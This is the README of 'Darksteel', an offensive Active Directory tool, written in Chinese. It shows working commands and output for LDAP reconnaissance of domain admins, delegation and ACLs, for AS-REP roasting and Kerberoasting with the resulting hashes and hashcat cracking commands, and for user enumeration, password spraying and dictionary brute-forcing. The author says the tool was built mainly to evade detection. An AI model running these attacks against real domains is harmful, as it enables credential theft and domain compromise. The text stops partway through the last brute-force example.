介绍

Darksteel 是一款域内自动化信息搜集并利用的工具。在渗透时发现单独搜集域内信息比较繁琐,漏洞利用也需要很多工具,所以完成此项目,帮助我解决域内信息搜集繁琐问题以及漏洞利用问题。此项目以规避检测为主要目的完成,直接对域控进行攻击的利用没有做,因为如果有设备会产生大量的告警,后续可能会添加bypass检测的利用。

功能演示

可不填写账号密码使用本地账号进行认证查询(-d参数需要填写域名)

  1. darksteel.exe ldap -d dc.domain.com -n domain.com -m computer
  2. ____ ______ ____ __ __ ____ ______ ____ ____ __
  3. /\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
  4. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
  5. \ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
  6. \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
  7. \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
  8. \/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
  9. v2.0.0
  10. [*] Domain Computers:
  11. WIN-KQH5FQSIJSH
  12. DESKTOP-AO8D722
  13. DESKTOP-DO7D913
  14. WIN-7UI852PL
  15. EXCHANGESERVER

项目主要功能

  1. ldap
  2. 当我们拥有一个域内账号密码(hash),可以通过ldap进行搜集域内有用信息,如spn、委派、存活计算机等等信息,为域渗透进行准备
  3. kerberos
  4. 针对kerberos漏洞进行利用
  5. blast
  6. 爆破域用户
  7. computerip
  8. 批量查询域内计算机对应的ip
  1. ____ ______ ____ __ __ ____ ______ ____ ____ __
  2. /\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
  3. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
  4. \ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
  5. \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
  6. \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
  7. \/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
  8. v2.0.0
  9. 自动化域内信息搜集、kerberos利用工具
  10. Usage:
  11. darksteel [command]
  12. Available Commands:
  13. blast 爆破域内用户
  14. completion Generate the autocompletion script for the specified shell
  15. computerip 查询域内计算机的ip地址
  16. help Help about any command
  17. kerberos kerberos利用
  18. ldap ldap查询
  19. Flags:
  20. -d, --dc string 域控地址
  21. -n, --domain string 域名
  22. -h, --help help for darksteel
  23. Use "darksteel [command] --help" for more information about a command.

使用实例

Ldap

1、当我们拥有一个域内账号密码(hash),可以通过ldap进行搜集域内有用信息,如spn、委派、存活计算机等等信息,为域渗透进行准备
  1. darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -a
  2. ____ ______ ____ __ __ ____ ______ ____ ____ __
  3. /\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
  4. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
  5. \ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
  6. \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
  7. \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
  8. \/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
  9. v2.0.0
  10. [*] Domain User:
  11. Administrator
  12. Guest
  13. krbtgt
  14. wanliu
  15. qt
  16. zz
  17. xx
  18. exchangeuser
  19. qt01
  20. ac
  21. [*] Domain Admins:
  22. CN=wanliu,CN=Users,DC=wanliu1,DC=com
  23. CN=Administrator,CN=Users,DC=wanliu1,DC=com
  24. [*] AdminSDHolder:
  25. Administrator
  26. krbtgt
  27. wanliu
  28. [*] sIDHistory:
  29. [*] Enterprise Admins:
  30. CN=Administrator,CN=Users,DC=wanliu1,DC=com
  31. [*] OU :
  32. Domain Controllers
  33. Microsoft Exchange Security Groups
  34. [*] Ca Computer:
  35. wanliu1-WIN-KQH5FQSIJSH-CA
  36. [*] Esc1 vulnerability template:
  37. [*] Esc2 vulnerability template:
  38. [*] MsSql Computer:
  39. WIN-7UI852PL
  40. [*] Maq Number:
  41. 10
  42. [*] DC Computer:
  43. WIN-KQH5FQSIJSH
  44. [*] Acl :
  45. qt 完全控制 ------> ac
  46. qt 修改密码 ------> zz
  47. qt01 拥有DCSync权限
  48. [*] Trust Domain:
  49. [*] Domain Computers:
  50. WIN-KQH5FQSIJSH
  51. DESKTOP-AO8D722
  52. DESKTOP-DO7D913
  53. WIN-7UI852PL
  54. EXCHANGESERVER
  55. [*] Survival Computer:
  56. WIN-KQH5FQSIJSH --> Windows Server 2012 R2 Standard
  57. DESKTOP-AO8D722 --> Windows 10 专业版
  58. DESKTOP-DO7D913 --> Windows 10 专业版
  59. WIN-7UI852PL --> Windows Server 2008 R2 Enterprise
  60. EXCHANGESERVER --> Windows Server 2016 Datacenter
  61. [*] Exchange Servers:
  62. CN=EXCHANGESERVER,CN=Computers,DC=wanliu1,DC=com
  63. [*] Exchange Trusted Subsystem:
  64. CN=EXCHANGESERVER,CN=Computers,DC=wanliu1,DC=com
  65. [*] Exchange Organization Management:
  66. CN=Administrator,CN=Users,DC=wanliu1,DC=com
  67. [*] Asreproast User:
  68. xx
  69. [*] 非约束委派机器:
  70. CN=WIN-KQH5FQSIJSH,OU=Domain Controllers,DC=wanliu1,DC=com [WIN-KQH5FQSIJSH]
  71. [*] 非约束委派用户:
  72. CN=zz,CN=Users,DC=wanliu1,DC=com [zz]
  73. [*] 约束委派机器:
  74. CN=WIN-7UI852PL,CN=Computers,DC=wanliu1,DC=com [WIN-7UI852PL]
  75. cifs/WIN-KQH5FQSIJSH.wanliu1.com/wanliu1.com
  76. cifs/WIN-KQH5FQSIJSH.wanliu1.com
  77. cifs/WIN-KQH5FQSIJSH
  78. cifs/WIN-KQH5FQSIJSH.wanliu1.com/WANLIU1
  79. cifs/WIN-KQH5FQSIJSH/WANLIU1
  80. [*] 约束委派用户:
  81. [*] 基于资源约束委派:
  82. CN=DESKTOP-AO8D722,CN=Computers,DC=wanliu1,DC=com -> creator S-1-5-21-3163795713-59934753-1752793692-1106[qt]
  83. CN=DESKTOP-DO7D913,CN=Computers,DC=wanliu1,DC=com -> creator S-1-5-21-3163795713-59934753-1752793692-1106[qt]
  84. CN=WIN-7UI852PL,CN=Computers,DC=wanliu1,DC=com -> creator S-1-5-21-3163795713-59934753-1752793692-1106[qt]
  85. [*] SPN:CN=xx,CN=Users,DC=wanliu1,DC=com
  86. cifs/admin
  87. [*] SPN:CN=WIN-KQH5FQSIJSH,OU=Domain Controllers,DC=wanliu1,DC=com
  88. exchangeAB/WIN-KQH5FQSIJSH
  89. exchangeAB/WIN-KQH5FQSIJSH.wanliu1.com
  90. Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/WIN-KQH5FQSIJSH.wanliu1.com
  91. ldap/WIN-KQH5FQSIJSH.wanliu1.com/ForestDnsZones.wanliu1.com
  92. ldap/WIN-KQH5FQSIJSH.wanliu1.com/DomainDnsZones.wanliu1.com
  93. TERMSRV/WIN-KQH5FQSIJSH
  94. TERMSRV/WIN-KQH5FQSIJSH.wanliu1.com
  95. DNS/WIN-KQH5FQSIJSH.wanliu1.com
  96. GC/WIN-KQH5FQSIJSH.wanliu1.com/wanliu1.com
  97. RestrictedKrbHost/WIN-KQH5FQSIJSH.wanliu1.com
  98. RestrictedKrbHost/WIN-KQH5FQSIJSH
  99. RPC/f20db9b6-b740-4670-ab3c-ead6acf58f4f._msdcs.wanliu1.com
  100. HOST/WIN-KQH5FQSIJSH/WANLIU1
  101. HOST/WIN-KQH5FQSIJSH.wanliu1.com/WANLIU1
  102. HOST/WIN-KQH5FQSIJSH
  103. HOST/WIN-KQH5FQSIJSH.wanliu1.com
  104. HOST/WIN-KQH5FQSIJSH.wanliu1.com/wanliu1.com
  105. E3514235-4B06-11D1-AB04-00C04FC2DCD2/f20db9b6-b740-4670-ab3c-ead6acf58f4f/wanliu1.com
  106. ldap/WIN-KQH5FQSIJSH/WANLIU1
  107. ldap/f20db9b6-b740-4670-ab3c-ead6acf58f4f._msdcs.wanliu1.com
  108. ldap/WIN-KQH5FQSIJSH.wanliu1.com/WANLIU1
  109. ldap/WIN-KQH5FQSIJSH
  110. ldap/WIN-KQH5FQSIJSH.wanliu1.com
  111. ldap/WIN-KQH5FQSIJSH.wanliu1.com/wanliu1.com
  112. [*] SPN:CN=EXCHANGESERVER,CN=Computers,DC=wanliu1,DC=com
  113. IMAP/EXCHANGESERVER
  114. IMAP/exchangeserver.wanliu1.com
  115. IMAP4/EXCHANGESERVER
  116. IMAP4/exchangeserver.wanliu1.com
  117. POP/EXCHANGESERVER
  118. POP/exchangeserver.wanliu1.com
  119. POP3/EXCHANGESERVER
  120. POP3/exchangeserver.wanliu1.com
  121. exchangeRFR/EXCHANGESERVER
  122. exchangeRFR/exchangeserver.wanliu1.com
  123. exchangeAB/EXCHANGESERVER
  124. exchangeAB/exchangeserver.wanliu1.com
  125. exchangeMDB/EXCHANGESERVER
  126. exchangeMDB/exchangeserver.wanliu1.com
  127. SMTP/EXCHANGESERVER
  128. SMTP/exchangeserver.wanliu1.com
  129. SmtpSvc/EXCHANGESERVER
  130. SmtpSvc/exchangeserver.wanliu1.com
  131. TERMSRV/EXCHANGESERVER
  132. TERMSRV/exchangeserver.wanliu1.com
  133. WSMAN/exchangeserver
  134. WSMAN/exchangeserver.wanliu1.com
  135. RestrictedKrbHost/EXCHANGESERVER
  136. HOST/EXCHANGESERVER
  137. RestrictedKrbHost/exchangeserver.wanliu1.com
  138. HOST/exchangeserver.wanliu1.com
  139. [*] SPN:CN=DESKTOP-AO8D722,CN=Computers,DC=wanliu1,DC=com
  140. TERMSRV/DESKTOP-AO8D722
  141. TERMSRV/DESKTOP-AO8D722.wanliu1.com
  142. RestrictedKrbHost/DESKTOP-AO8D722
  143. HOST/DESKTOP-AO8D722
  144. RestrictedKrbHost/DESKTOP-AO8D722.wanliu1.com
  145. HOST/DESKTOP-AO8D722.wanliu1.com
  146. [*] SPN:CN=DESKTOP-DO7D913,CN=Computers,DC=wanliu1,DC=com
  147. TERMSRV/DESKTOP-DO7D913
  148. TERMSRV/DESKTOP-DO7D913.wanliu1.com
  149. RestrictedKrbHost/DESKTOP-DO7D913
  150. HOST/DESKTOP-DO7D913
  151. RestrictedKrbHost/DESKTOP-DO7D913.wanliu1.com
  152. HOST/DESKTOP-DO7D913.wanliu1.com
  153. [*] SPN:CN=WIN-7UI852PL,CN=Computers,DC=wanliu1,DC=com
  154. WSMAN/WIN-7UI852PL
  155. WSMAN/WIN-7UI852PL.wanliu1.com
  156. TERMSRV/WIN-7UI852PL
  157. TERMSRV/WIN-7UI852PL.wanliu1.com
  158. MSSQLSvc/WIN-7UI852PL.wanliu1.com:1433
  159. MSSQLSvc/WIN-7UI852PL.wanliu1.com
  160. RestrictedKrbHost/WIN-7UI852PL
  161. HOST/WIN-7UI852PL
  162. RestrictedKrbHost/WIN-7UI852PL.wanliu1.com
  163. HOST/WIN-7UI852PL.wanliu1.com
  164. [*] SPN:CN=krbtgt,CN=Users,DC=wanliu1,DC=com
  165. kadmin/changepw
  166. [*] SPN:CN=zz,CN=Users,DC=wanliu1,DC=com
  167. mssql/DESKTOP-AO8D722
2、当我们想要查找域内某些关键字对应的user或者computer时可以使用关键字查询,来找到哪些是管理员user和管理员computer
  1. darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -z 管理员
  2. ____ ______ ____ __ __ ____ ______ ____ ____ __
  3. /\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
  4. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
  5. \ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
  6. \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
  7. \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
  8. \/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
  9. v1.0.8
  10. [*] CN=Administrators,CN=Builtin,DC=test,DC=com --> 管理员对计算机/域有不受限制的完全访问权
  11. [*] CN=Schema Admins,CN=Users,DC=test,DC=com --> 架构的指定系统管理员
  12. [*] CN=Enterprise Admins,CN=Users,DC=test,DC=com --> 企业的指定系统管理员
  13. [*] CN=Domain Admins,CN=Users,DC=test,DC=com --> 指定的域管理员
  14. [*] CN=zz,CN=Users,DC=test,DC=com --> 假管理员
3、如果想查询的内容工具内没有写到也可以使用ldap语法进行查询
  1. darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -f "(objectClass=Computer)" -t cn,dNSHostName
  2. ____ ______ ____ __ __ ____ ______ ____ ____ __
  3. /\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
  4. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
  5. \ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
  6. \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
  7. \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
  8. \/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
  9. v1.0.8
  10. DN: CN=WIN-KQH5FQSIJSH,OU=Domain Controllers,DC=test,DC=com
  11. cn: [WIN-KQH5FQSIJSH]
  12. dNSHostName: [WIN-KQH5FQSIJSH.test.com]
  13. DN: CN=DESKTOP-AO8D722,CN=Computers,DC=test,DC=com
  14. cn: [DESKTOP-AO8D722]
  15. dNSHostName: [DESKTOP-AO8D722.test.com]
  16. DN: CN=DESKTOP-DO7D913,CN=Computers,DC=test,DC=com
  17. cn: [DESKTOP-DO7D913]
  18. dNSHostName: [DESKTOP-DO7D913.test.com]
  19. DN: CN=WIN-7UI852PL,CN=Computers,DC=test,DC=com
  20. cn: [WIN-7UI852PL]
  21. dNSHostName: [WIN-7UI852PL.test.com]

Kerberos

1、利用kerberos不需要域认证对用户密钥进行获取,可选择输出hashcat或john爆破格式(默认为hashcat)爆破出来的密码则为该用户的密码,如果不指定目标用户则需要一个域用户账号密码进行ldap查询并输出所有可利用密钥。hashcat爆破命令:hashcat -m 18200 hash.txt pass.txt —force
  1. darksteel.exe kerberos -m asreproast -d 192.168.1.1 -n test.com -u user -p password(hash)
  2. ____ ______ ____ __ __ ____ ______ ____ ____ __
  3. /\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
  4. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
  5. \ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
  6. \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
  7. \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
  8. \/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
  9. v1.0.8
  10. [*] Target domain: test.com (192.168.1.1)
  11. [*] Use LDAP to retreive vulnerable accounts
  12. [*] Ask AS-Rep for user zz without pre-authentication
  13. [*] Get a valid ticket with encryption: arcfour-hmac-md5
  14. [*] Hashes:
  15. $krb5asrep$23$zz@test.COM:8193197b866da1209af56fd5f4610c38$bc8ee9135bd82f0b2333
  16. af24ae376bb014cd0400ef9b8ff0d0dbc8180c671cc6fe1290cd2c876f84352126bd7948adbc6b3f
  17. 51d85ebe1e8dfa15c53443fb835d743ce3cd3e5ac7f2549271385134bc685ffe55bdb30103cf132a
  18. 69267d9cec9201f478547892b3343c7427b83a901f6c01d877a4357d14d0384cd8b3cf2940e6e32e
  19. a862d700499c6a7791e4fd17228a9adc5db5ebbe6e69d59bcde7f7e3fd3751ba54eda6339cb87b69
  20. 5a7a5daf5964a0e626129e8acc9b783aed7c060a4044d41f02da52bcff466a32dc465de10cc7e90c
  21. 7c5b84fcac701107da4300db4cfc36d58cc0524f23b5e16789656
2、指定目标用户,则不需要域用户认证
  1. darksteel.exe kerberos -m asreproast -d 192.168.1.1 -n test.com -t zz
  2. ____ ______ ____ __ __ ____ ______ ____ ____ __
  3. /\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
  4. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
  5. \ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
  6. \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
  7. \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
  8. \/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
  9. v1.0.8
  10. [*] Target domain: test.com (192.168.1.1)
  11. [*] Ask AS-Rep for user zz without pre-authentication
  12. [*] Get a valid ticket with encryption: arcfour-hmac-md5
  13. [*] Hashes:
  14. $krb5asrep$23$zz@test.COM:8193197b866da1209af56fd5f4610c38$bc8ee9135bd82f0b2333
  15. af24ae376bb014cd0400ef9b8ff0d0dbc8180c671cc6fe1290cd2c876f84352126bd7948adbc6b3f
  16. 51d85ebe1e8dfa15c53443fb835d743ce3cd3e5ac7f2549271385134bc685ffe55bdb30103cf132a
  17. 69267d9cec9201f478547892b3343c7427b83a901f6c01d877a4357d14d0384cd8b3cf2940e6e32e
  18. a862d700499c6a7791e4fd17228a9adc5db5ebbe6e69d59bcde7f7e3fd3751ba54eda6339cb87b69
  19. 5a7a5daf5964a0e626129e8acc9b783aed7c060a4044d41f02da52bcff466a32dc465de10cc7e90c
  20. 7c5b84fcac701107da4300db4cfc36d58cc0524f23b5e16789656
3、如果目标将用户设置了spn后,则可以将密钥输出,可选择输出hashcat或john爆破格式(默认为hashcat)爆破出来的密码则为该用户的密码,如果不指定目标用户则需要一个域用户账号密码进行ldap查询并输出所有可利用密钥。hashcat爆破命令:hashcat -m 13100 hash.txt pass.txt —force
  1. darksteel.exe kerberos -m kerberoast -d 192.168.1.1 -n test.com -u user -p password(hash)
  2. ____ ______ ____ __ __ ____ ______ ____ ____ __
  3. /\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
  4. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
  5. \ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
  6. \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
  7. \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
  8. \/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
  9. v1.0.8
  10. [*] Target domain: test.com (192.168.1.1)
  11. [*] Use username and password/key as credentials to request a TGT
  12. [*] Use LDAP to retreive vulnerable accounts
  13. [*] Found 1 users to Kerberoast found in LDAP
  14. [*] CN=zz,CN=Users,DC=test,DC=com
  15. sAMAccountName : zz
  16. distinguishedName : CN=zz,CN=Users,DC=test,DC=com
  17. servicePrincipalName: mssql/DESKTOP-AO8D722
  18. [*] Asking TGS for principal: zz
  19. [*] Hashes:
  20. $krb5tgs$23$*zz$WANLIU1.COM$zz*$c1c2da2dbd793dbe2f627132f992e3a7$a3f77d350104545
  21. 3a8ab2917a0961d3ca54f4e97610d00ee5cb3ac03dbc84a9831d4bbd007d143619de8ca277e36c97
  22. 7f5e672396750350a14916b5dece2daa279e47f7684b03d044e9e748f5f3ce777efe73e4df64d814
  23. 75dd1217784fe78fabe7195f5dc659520081152c045574200bfe68aad97cc6c529c3d6e57eefbbaa
  24. f270fdcee23445ce160b4c71346753fd8464aa5e6073b8b0c9d6e3865a4f48dc61d05f9a97a4d0a5
  25. 6caf0ad0059e058e4746e260d2905e429e31ed7655c87fghtf5654f54c9e506d3b737f678f9fd2bd
  26. 68c226e61f852a6c1e35ceb3b1f6f3c78f1160ddb4ea290870eff55f4ba6ca0161a5bf5545a8da59
  27. fe20610aafa91fbbe7b8e8f3ff715f965bd09681aa41b929f98a94f8084fca1cb98f38e718612f1e
  28. 51d779c622ae91e0ee62bd2a809b59e0031f57c2647b8ef15972015f3669a80d489139153d20312b
  29. c8f9be5252fc6ed6dd78a22dec9458d41e6a940534d33c8ajhhgj5f36d224332fec721874e46fea7
  30. b2397922c6cbe689ef0ff7d0cb1c9d89c975c462a746ae5d473b9cfc37fadcecc96a3907980a13b9
  31. 28cd053467090458ab0a8995e1237cef641698172d6537c2ef4e5987726d6a007b03ffec867f3ab8
  32. 5fd1ce7e89f6bc694266c61ca74e6af2200bfa3a90313bbda3282ed267e6f59d477e789e4c454f66
  33. ac942df4461fc2bad317e23176e8cc299261c1c947dca068153b2fab47b018b2e82ba08d20078195
  34. 8149dd3b03c27ec17bee22496c7cccb3e6acd23c6e7bce62658f7274ce3eef06aa16d4c94bbfbe42
  35. 3f9e7b7254625d28c27fbf2bc07aeec63f7ebe25b49742346eea44e61478e212d719be9c98a53a1c
  36. 2657790c02654fa1c9caf5bdbb816cece4e6ce6e48c86323a8596f059b9d4e4856d52480f56272a5
  37. a393473eaf0ab12b3e085aa97ee28311c4cd54797229522001a3e5fd5fdefgrg4e03efe691635448
  38. 392ea8275cb0916bcc205fb2376ae60008a24cdea072069ca4710d9290d77bab830cf96c97c31fb0
  39. bab707802409efbad0bb30c6efe207c75632225a52ec757f878e8d97647c34d6703e2a94f2701739
  40. 9ba6efd18a4f714b63468810929287ca3359fff00632ab5de545667d39d6e77456c1b7df57d400a7
  41. ec9ad23b0fc93f24f9c151d9509aeabfbb298a02865bd5d16a273fc6ffb8df14456e0b2eaf973653
  42. 895e7f51f73606294845d6a9ccab6a68b5774a706f06a692c4b619e50ac35fa48e1aadb6323c279f
  43. 68e4c6d29462bd82371a0f24744cbb43bf4ca3a6cca165fe4b4025a4b69a2208bd16eacb0a029973
  44. 86bff57b4fa0924713d7b32295096ac7cc7942299a0b5126880c768edcb7743a429ded7323941cdd
  45. c6293d7962553c7423b465d9c1c9aae98cf14e30ff0f21e8d75275a48dc1fac5bb37987057e74f83
  46. f7aeb47dc601826d6643f95c33c7d388a3120b08ed2864e0c0bdacfb41594cea5d286583ed2fd520
  47. 89857642a160760dca1cea4

blast

1、当我们找到域但还没有域用户的时候可以使用域用户枚举进行枚举域用户。想要输出失败信息可以使用-v参数
  1. darksteel.exe blast -m userenum -d 192.168.1.1 -n test.com -U users.txt
  2. ____ ______ ____ __ __ ____ ______ ____ ____ __
  3. /\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
  4. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
  5. \ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
  6. \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
  7. \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
  8. \/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
  9. v1.0.8
  10. [+] USERNAME: zz@test.com
  11. [+] USERNAME: xx@test.com
  12. Done! Tested logins in 0.034 seconds
  13. darksteel.exe blast -m userenum -d 192.168.1.1 -n test.com -U users.txt -v
  14. ____ ______ ____ __ __ ____ ______ ____ ____ __
  15. /\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
  16. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
  17. \ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
  18. \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
  19. \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
  20. \/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
  21. v1.0.8
  22. [!] asdfqwadad@test.com - User does not exist
  23. [!] admin@test.com - User does not exist
  24. [+] USERNAME: zz@test.com
  25. [+] USERNAME: xx@test.com
  26. Done! Tested logins in 0.002 seconds
2、找到用户后使用单个密码进行爆破
  1. darksteel.exe blast -m passspray -d 192.168.1.1 -n test.com -U users.txt -p 123456
  2. ____ ______ ____ __ __ ____ ______ ____ ____ __
  3. /\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
  4. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
  5. \ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
  6. \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
  7. \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
  8. \/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
  9. v1.0.8
  10. [+] SUCCESS: zz@test.com:123456
  11. Done! Tested logins in 0.024 seconds
3、使用密码字典爆破单个用户
  1. darksteel.exe blast -m blastpass -d 192.168.1.1 -n test.com -u zz -P pass.txt
  2. ____ ______ ____ __ __ ____ ______ ____ ____ __
  3. /\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
  4. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
  5. \ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
  6. \ \ \_\ \ \ \/\ \ \ \\ \\ \ \\`\ /\ \L\ \ \ \ \ \ \ \L\ \ \ \L\ \ \ \L\ \
  7. \ \____/\ \_\ \_\ \_\ \_\ \_\ \_\\ `\____\ \ \_\ \ \____/\ \____/\ \____/
  8. \/___/ \/_/\/_/\/_/\/ /\/_/\/_/ \/_____/ \/_/ \/___/ \/___/ \/___/
  9. v1.0.8
  10. [+] SUCCESS: zz@test.com:123456
  11. Done! Tested logins in 0.013 seconds
4、使用用户名密码对应字典爆破
  1. darksteel.exe blast -m userpass -d 192.168.1.1 -n test.com -F userpass.txt
  2. ____ ______ ____ __ __ ____ ______ ____ ____ __
  3. /\ _`\ /\ _ \/\ _`\ /\ \/\ \ /\ _`\ /\__ _\/\ _`\ /\ _`\ /\ \
  4. \ \ \/\ \ \ \L\ \ \ \L\ \ \ \/'/'\ \,\L\_\/_/\ \/\ \ \L\_\ \ \L\_\ \ \
  5. \ \ \ \ \ \ __ \ \ , /\ \ , < \/_\__ \ \ \ \ \ \ _\L\ \ _\L\ \ \ _
